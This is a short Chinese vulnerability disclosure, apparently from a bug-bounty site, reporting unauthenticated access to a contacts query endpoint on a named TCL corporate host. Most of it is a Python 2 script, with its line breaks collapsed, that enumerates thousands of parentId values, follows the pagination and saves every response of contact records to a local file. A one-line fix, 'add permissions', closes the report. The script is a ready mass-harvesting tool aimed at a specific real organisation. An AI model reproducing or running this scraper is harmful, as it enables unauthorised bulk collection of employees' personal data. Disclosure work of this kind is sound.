染雾一个系统查询接口存在未授权访问~
<code>#!/usr/bin/env python# coding: utf-8 # pip install requests requests_ntlmimport requestsimport reimport sysimport timefrom requests_ntlm import HttpNtlmAuthreload(sys)sys.setdefaultencoding('utf-8')PAGE_REGEX = re.compile(r'PageCount":.*(\d),')def main(start_num, end_num): delay = 3 delay_count = 100 i = 0 with open('tcl_account.txt','a') as f: for id in xrange(start_num, end_num): i += 1 _url = "http://ep.tclcom.com/_layouts/TCL.EP.GPortal.UI/ashx/ContactsHander.ashx?method=query&maxItemCount=11&pageIndex=1&parentId=000%s" % id json, pagecount = get(_url) print _url f.write('%s\n%s\n' % (_url,json)) if pagecount > 1: print '[*] fo
und page size: %s' % pagecount for pageindex in range(2, pagecount+1): page_url = _url.replace('pageIndex=1', 'pageIndex=%s' % pageindex) print '[%s]' % pageindex, page_url _json, _ = get(page_url) f.write('%s\n%s\n' % (page_url, _json)) if i % delay_count == 0: time.sleep(delay) print '[-] delay %s(s)' % delay def get(url): url = "%s&t=%s" % (url, time.time()) result = '' pagecount = 1 auth_nt = HttpNtlmAuth('user', '***') #req = requests.get(url=url, auth=auth_nt) req = requests.get(url=url, timeout=15) if req.status_code == 200: result = req.text match = PAGE_REGEX.search(result) if match: pagecount = int(match.group(1)) return (result, pagecount)if __name__ == '__main__': main(84599, 87715)</code> 支持分页抓取
http://ep.tclcom.com/_layouts/TCL.EP.GPortal.UI/ashx/ContactsHander.ashx?method=query&maxItemCount=11&pageIndex=1&parentId=00085221
解决方案:
添加权限~
